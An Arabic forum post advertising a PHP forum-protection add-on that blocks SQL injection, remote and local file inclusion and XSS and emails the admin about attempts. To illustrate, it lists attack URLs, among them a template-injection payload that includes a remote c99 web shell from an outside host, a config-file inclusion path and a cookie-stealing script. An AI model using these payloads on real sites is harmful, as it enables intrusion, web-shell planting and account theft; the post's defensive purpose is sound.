الويب العربي - طريقة منع ثغرات php

السلام عليكم اخي
لحماية المنتدى ومنع تطبيق انواع الثغرات وبشكل محدد تطبيق اكواد الثغرات من انواع SQL , RFI , LFI , Xss واكواد التحويل ومنع تلغيم المنتدى باكواد ثغرات في ملفات ال faq.php وال calendar.php وال showgroups.php

والمميز في الهاك انه به خاصية التبليغ على البريد مباشرة في حال حدث اي محاولة اختراق راح تصلك رساله وفيها ايبي الي حاول يخترق و استثمار الثغرة والتاريخ والوقت , لكي تحول دون وقوعها وهذا مثال من البريد بعد تجربة الهاك لمدة 3 شهور والحمد الله دو اي خلل بحمد الله .

اولا لا اسمح لاي شخص كان بانه يقوم بتغير الحقوق في البرمجة , ولا حتى حرف واحد
ثانية مثال على الهاك مباشرة .
أ . منع تطبيق ثغرات ال Remote SQL Injection ( ثغرات الحقن )
http://hackteach.org/cc/index.php?id...union%20sel ect
http://hackteach.org/cc/index.php?id=-1+union+select
http://hackteach.org/cc/index.php?id...nion/**/sel ect

ب . منع تطبيق ثغرات ال Remote File Include ( ثغرات الاحتواء والتضمين )
http://hackteach.org/cc/misc.php?do=page&template= {${include('ht tp://casavie.net/hack/c99.txt')}}{${exit()}

كود:
http://hackteach.org/cc/misc.php?do=page&template= {${include('http://casavie.net/hack/c99.txt')}}{${ exit()}}&

ج . منع تطبيق ثغرات ال Remote Local File Include ( ثغرات الاحتواء والتضمين الداخلي )
http://hackteach.org/cc/faq.php?faq=...des/config. php

د . منع ثغرات ال Cross Site $cripting ( ثغرات سحب كوكيز المدير و الاعضاء وسرقة عضوياتهم )
http://hackteach.org/cc/faq.php?faq=...;%3C/script %3E

كود:
http://hackteach.org/cc/faq.php?faq=<script>alert( document.cookie);</script>
منع اي كود تحويل كان وفي حال تواجد الاحصائيات والاهدائات واخر عشر مواضيع , تم حل مشكلتهم قطعيا قطعيا ,

الان نجي لخطوة تعديل ال البريد :

اول ما تحمل الهاك وتفك الضغط عنه , قوم بفتحه بالمفكرة او الدفتر او اي محرر php ,
قم بالبحث عن admin@h4ps.com , واستبدله بالبريد الي بتريد يوصلك عليه تبليغ محاولة الاختراق ,

هذا والله ولي التوفيق

روابط التحميل :
http://www.hackteach.net/download.ph...4cda663b9f. zip
http://up3.m5zn.com/7856599448.zip.htm